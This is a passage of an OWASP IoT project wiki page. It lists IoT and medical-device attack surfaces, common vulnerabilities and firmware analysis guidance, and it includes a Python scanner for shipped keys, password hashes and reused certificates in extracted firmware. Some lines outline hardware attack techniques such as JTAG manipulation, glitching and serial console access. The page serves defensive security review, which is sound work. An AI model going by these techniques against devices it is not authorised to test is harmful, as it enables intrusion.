The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known vulnerabilities (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single-user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML parsing (HL7 v3 and CDA are XML; HL7 v2 is pipe-delimited)<br />
** XXE, and XSS where message content is rendered in a web viewer<br />
* Information disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys (symmetric keys and asymmetric private keys)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Blocking of OTA firmware updates<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption key across all devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* PII sent to third parties even when encrypted (is the sharing necessary and disclosed?)<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
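The checks in the "Device Firmware Vulnerabilities" row above can be scripted over an extracted root filesystem. The following is an added example written for this page, not code from the OWASP Firmware Analysis Project or any of the tools listed. It uses only the Python standard library, so it does not parse X.509 and leaves certificate expiry to a tool such as `openssl x509 -noout -dates`; it does report private keys, password hashes shipped in `/etc/shadow` (any crackable hash in an image is a hardcoded credential, and md5crypt/descrypt hashes are additionally weak), BusyBox version strings for matching against advisories, and certificates that are byte-identical across several images ("same certificate used on multiple devices"). The two mini root filesystems it builds are constructed test data with placeholder PEM bodies, not real keys or firmware.<br />

```python
"""Scan extracted firmware root filesystems for shipped secrets, weak password
hashes, component versions and certificates reused across images.
Added example (not OWASP project code); the sample images are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path

PEM_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
PEM_CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
BUSYBOX_RE = re.compile(rb"BusyBox v(\d+\.\d+\.\d+)")
LOCKED = {"x", "*", "!", "!!"}  # deferred to shadow, or account locked


def check_password_file(rel, data):
    """Flag empty passwords, any shipped (crackable) hash, and weak hash algorithms."""
    out = []
    for line in data.decode("utf-8", "replace").splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw_hash = fields[0], fields[1]
        if pw_hash == "":
            out.append(("empty-password", rel, user))
        elif pw_hash in LOCKED or pw_hash[0] in "!*":
            continue
        else:
            # Every unit ships with this same secret: a hardcoded credential.
            out.append(("hardcoded-credential", rel, user))
            if pw_hash.startswith("$1$") or (len(pw_hash) == 13 and "$" not in pw_hash):
                out.append(("weak-hash", rel, user))  # md5crypt or descrypt
    return out


def scan_rootfs(root):
    """Return (kind, relative-path, detail) findings for one extracted image."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        if PEM_KEY_RE.search(data):
            findings.append(("private-key", rel, ""))
        for m in PEM_CERT_RE.finditer(data):
            findings.append(("certificate", rel, hashlib.sha256(m.group(0)).hexdigest()[:16]))
        m = BUSYBOX_RE.search(data)
        if m:
            findings.append(("busybox-version", rel, m.group(1).decode()))
        if rel in ("etc/shadow", "etc/passwd"):
            findings.extend(check_password_file(rel, data))
    return findings


def shared_certificates(scans):
    """Certificate digest -> set of images shipping it, for digests seen in more than one image."""
    seen = {}
    for image, findings in scans.items():
        for kind, _rel, digest in findings:
            if kind == "certificate":
                seen.setdefault(digest, set()).add(image)
    return {d: imgs for d, imgs in seen.items() if len(imgs) > 1}


def build_sample_images(base):
    """Write two constructed mini root filesystems (placeholder PEM bodies, not real keys)."""
    cert = (b"-----BEGIN CERTIFICATE-----\nMIIBconstructedPlaceholderNotARealCertificate==\n"
            b"-----END CERTIFICATE-----\n")
    key = (b"-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedPlaceholderNotARealKey==\n"
           b"-----END RSA PRIVATE KEY-----\n")
    images = {
        "camera_v1.0.bin": {
            "bin/busybox": b"\x7fELF...BusyBox v1.22.1 (constructed) multi-call binary\x00",
            "etc/shadow": (b"root:$1$saltsalt$constructedMd5cryptHash:17000:0:99999:7:::\n"
                           b"admin::17000:0:99999:7:::\n"
                           b"daemon:*:17000:0:99999:7:::\n"),
            "etc/ssl/server.pem": cert + key,
        },
        "camera_v1.1.bin": {
            "bin/busybox": b"\x7fELF...BusyBox v1.31.1 (constructed) multi-call binary\x00",
            "etc/shadow": b"root:$6$saltsalt$constructedSha512cryptHash:18000:0:99999:7:::\n",
            "etc/ssl/server.pem": cert + key,  # same certificate in every image
        },
    }
    for image, files in images.items():
        for rel, data in files.items():
            p = Path(base) / image / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(data)
    return list(images)


def demo():
    """Scan the constructed images; returns (per-image findings, shared certificate digests)."""
    with tempfile.TemporaryDirectory() as tmp:
        scans = {img: scan_rootfs(Path(tmp) / img) for img in build_sample_images(tmp)}
    return scans, shared_certificates(scans)
```

On a real image point `scan_rootfs` at the directory binwalk or the Firmware Modification Kit extracted, and run `shared_certificates` over every image in a product line; a digest that appears in more than one image means one leaked private key compromises the whole fleet.<br />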
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
